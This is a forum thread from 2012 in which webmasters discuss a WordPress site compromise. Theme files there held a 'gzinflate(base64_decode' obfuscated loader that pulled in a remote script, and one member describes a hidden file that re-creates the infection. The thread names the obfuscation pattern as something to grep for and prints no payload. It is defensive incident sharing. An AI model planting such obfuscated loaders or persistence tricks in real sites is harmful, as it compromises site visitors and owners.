Welcome to WebmasterWorld Guest from 23.22.140.143

Forum Moderators: rogerd & travelin cat

Message Too Old, No Replies

New Wordpress Hack?

     
1:22 am on Apr 15, 2012 (gmt 0)

Administrator

WebmasterWorld Administrator rogerd is a WebmasterWorld Top Contributor of All Time 10+ Year Member

joined:Aug 2, 2000
posts:9685
votes: 0


A blog I admin triggered a "Trojan.Malscript.html" warning when I loaded its home page with Norton running. I immediately checked Google Webmaster Tools and a number of web-scanners like AVG and others. They all gave the site a clean bill of health. It was still causing Norton to go off, so I looked at the source code.

I found a link to a javascript file hosted on an Australian "organicfoodmarkets" domain. Digging into the theme files, I found that some had been modified to include a line of code that included "gzinflate(base64_decode" followed by a long string. This was translated into the bogus script load code when the page was displayed.

The odd thing was that the files had apparently been modified over a month earlier, and GWT, along with everyone else, didn't catch it. Another machine running TrendMicro let me load the page without objection.

I think this was most likely a server side hack, i.e., via compromised FTP or Wordpress login, vs. some kind of code vulnerability.

So, it's a good idea to keep your eye on file dates and, of course, exercise normal security precautions for logins and passwords. Had it not been for Norton, this might have persisted a lot longer without my knowing it. Checking your files for the base64 code above would disclose an identical exploit, though if the hacker has FTP access any number of nasty things could be done.
2:02 am on Apr 15, 2012 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member lorax is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Mar 31, 2002
posts:7575
votes: 0


Thanks for the info rogerd. I haven't come across this personally but will be looking out for it now.
2:17 am on Apr 15, 2012 (gmt 0)

Administrator from US 

WebmasterWorld Administrator incredibill is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Jan 25, 2005
posts:14624
votes: 88


I think this was most likely a server side hack, i.e., via compromised FTP or Wordpress login, vs. some kind of code vulnerability.


Probably got in via Wordpress would be my guess as it's always responsible for some vulnerability somewhere, or even your hosted control panel as there have been some recent vulnerabilities in those as well.

However, if you're on shared hosting, they could've gotten in on any account and escalated privileges and performed that little trick server wide.
5:16 pm on Apr 16, 2012 (gmt 0)

Administrator

WebmasterWorld Administrator rogerd is a WebmasterWorld Top Contributor of All Time 10+ Year Member

joined:Aug 2, 2000
posts:9685
votes: 0


The intrusion seems to be confined to a single domain on that VPS. I had some work done on the site a few days before the files changed, and I'm guessing that there was some vulnerability on the coder's end. Even if he wasn't the source, he may have been hacked himself, had his login compromised, etc.

I deleted the coder's credentials once the work was complete and stable, but the intrusion (whether related or not) happened before that deletion.

Could be a coincidence, of course, and I don't rule out other possible hacks.
11:07 am on May 2, 2012 (gmt 0)

New User

joined:May 2, 2012
posts:1
votes: 0


i have a website, i was using word press, But now i have no website because my website was hoicked...
6:37 am on May 3, 2012 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Feb 16, 2004
posts:1341
votes: 0


Some more info about base64_decode hacks here-
[webmasterworld.com...]

The one I found on a shared hosting server had a "double secret" key file hidden with a non obvious file extension -- any time the corrupted file was deleted, the second file would replicate it.

Grep is your friend...
 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

Featured Threads

Free SEO Tools

Hire Expert Members